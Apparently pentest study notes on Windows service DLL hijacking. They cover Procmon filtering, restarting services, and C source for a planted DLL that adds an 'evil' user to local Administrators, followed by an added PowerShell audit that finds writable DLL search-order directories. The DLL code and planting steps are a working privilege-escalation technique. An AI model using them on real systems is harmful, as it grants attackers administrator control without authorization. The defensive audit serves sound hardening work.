• Run Procmon as administrator in the RDP session

  • Add filters

    • Result - is - NAME NOT FOUND - Include - click Add
    • Path - ends with - .dll - Include - click Add
    • Apply and OK
  • In cmd.exe, restart the service so Procmon captures its DLL lookups

    • sc stop dllsvc (or the name of the service being tested)
      • or sc.exe stop dllsvc
    • sc start dllsvc
    • OR net stop <servicename>
    • net start <servicename>
  • Procmon now shows the DLL lookups the service made while starting

  • Check whether any of the listed .dll paths sits in a directory your user can write to

  • Now create a .dll with that same name using the windows_dll.c script in Kali

    <aside>
    // For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
    // For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll

    #include <windows.h>
    #include <stdlib.h>   // system()

    // windows_dll.c: runs when the service process loads the planted DLL
    BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
    {
        if (dwReason == DLL_PROCESS_ATTACH) {
            // Add a new user and put it in the local Administrators group
            system("cmd.exe /k net user evil pass1234 /add");
            system("cmd.exe /k net localgroup administrators evil /add");
            ExitProcess(0);
        }
        return TRUE;
    }
    </aside>

    • x86_64-w64-mingw32-gcc windows_dll.c -shared -o <vuln-dll>.dll
  • Transfer the .dll to the writable location found in Procmon

  • sc stop dllsvc & sc start dllsvc

  • The evil user has now been added to the Administrators group (verify with net localgroup administrators)
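The weakness the steps above rely on is a directory in a service's DLL search order that a standard user can write to. The following PowerShell audit, added here and not part of the original note, lists those directories for every installed service so the ACLs can be tightened before anyone plants a DLL. It assumes an elevated PowerShell 5.1+ session, treats Everyone, BUILTIN\Users and Authenticated Users as low-privileged, and uses the machine-scope PATH.

```powershell
# Added audit, not from the original note: for every service, list the directories
# in the loader's DLL search order that low-privileged principals can write to.
# Assumptions: run elevated in PowerShell 5.1+; "low-privileged" means Everyone,
# BUILTIN\Users and Authenticated Users; PATH is the machine-scope PATH.
$lowPrivSids = @('S-1-1-0', 'S-1-5-32-545', 'S-1-5-11')
# Only rights that let a user plant a file: CreateFiles (WriteData) and
# CreateDirectories (AppendData). Modify and FullControl contain both bits.
$plantMask = [System.Security.AccessControl.FileSystemRights]::CreateFiles -bor
             [System.Security.AccessControl.FileSystemRights]::CreateDirectories

function Test-LowPrivWritable {
    param([string]$Dir)
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    foreach ($ace in (Get-Acl -LiteralPath $Dir).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if (($lowPrivSids -contains $sid) -and (($ace.FileSystemRights -band $plantMask) -ne 0)) {
            return $true
        }
    }
    return $false
}

function Get-ServiceExePath {
    param([string]$PathName)   # Win32_Service.PathName, e.g. "C:\x\svc.exe" -arg
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    if ($PathName.StartsWith('"')) {
        $end = $PathName.IndexOf('"', 1)
        if ($end -gt 1) { return $PathName.Substring(1, $end - 1) } else { return $null }
    }
    $m = [regex]::Match($PathName, '^(.*?\.exe)', 'IgnoreCase')   # unquoted path plus args
    if ($m.Success) { return $m.Groups[1].Value } else { return $PathName.Split(' ')[0] }
}

$machinePath = [Environment]::GetEnvironmentVariable('Path', 'Machine') -split ';' | Where-Object { $_ }
$findings = foreach ($svc in Get-CimInstance Win32_Service) {
    $exe = Get-ServiceExePath $svc.PathName
    if (-not $exe) { continue }
    # Search order under SafeDllSearchMode: application dir, System32, Windows dir, then PATH
    $dirs = @([System.IO.Path]::GetDirectoryName($exe), "$env:SystemRoot\System32", $env:SystemRoot) + $machinePath
    foreach ($d in ($dirs | Select-Object -Unique)) {
        if (Test-LowPrivWritable $d) {
            [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; WritableDir = $d }
        }
    }
}
$findings | Sort-Object WritableDir, Service | Format-Table -AutoSize
```

Any row where RunsAs is LocalSystem or another privileged account is the exact condition the note exploits; fix it by removing the write grant from the directory (icacls) or by moving the service binary out of the shared location. ACEs expressed as generic rights appear as raw integers and are not decoded by this script.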